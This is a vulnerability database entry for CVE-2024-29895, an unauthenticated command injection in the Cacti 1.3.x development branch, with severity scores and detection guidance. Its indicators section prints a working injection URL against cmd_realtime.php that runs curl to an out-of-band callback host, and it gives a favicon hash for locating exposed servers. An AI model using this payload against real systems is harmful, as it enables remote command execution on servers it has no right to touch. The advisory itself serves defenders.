cbcvebase.
CVE-2024-29895
published 2024-05-14

CVE-2024-29895: Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated…

PriorityP196critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
94.38%
99.8th percentile
Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. Commit 53e8014d1f082034e0646edc6286cde3800c683d contains a patch for the issue, but this commit was reverted in commit 99633903cad0de5ace636249de16f77e57a3c8fc.

Affected

2 ranges
VendorProductVersion rangeFixed in
cacticacti
debiancacti

Detection & IOCsextracted from sources · hover to see the quote

url/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1
path/cacti/cmd_realtime.php
  • The vulnerability is exploitable via unauthenticated GET request to /cacti/cmd_realtime.php with command injection in the query string (argv manipulation). Look for requests to cmd_realtime.php containing shell metacharacters such as `&&`, `|`, or `;` in URL parameters.
  • Exploitation requires PHP's `register_argc_argv` to be `On` (default in many environments including the official PHP Docker image). Audit PHP configurations for this setting as a risk indicator.
  • The Nuclei PoC template matches on HTTP 200 response AND an out-of-band HTTP callback containing 'User-Agent: curl' — monitor for unexpected outbound curl/HTTP requests originating from the Cacti server process.
  • Cacti instances can be fingerprinted via favicon hash -1797138069 on Shodan/FOFA; use this to identify exposed attack surface.
  • ·The vulnerability only exists on the 1.3.x DEV branch of Cacti, not stable releases.
  • ·The patch commit (53e8014d1f082034e0646edc6286cde3800c683d) was subsequently reverted (99633903cad0de5ace636249de16f77e57a3c8fc), meaning patched versions may have been re-exposed. Verify the specific commit state of any deployed Cacti 1.3.x instance.

CVSS provenance

nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
osv10.0CRITICAL
vulncheck10.0CRITICAL
vendor_debian10.0LOW
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.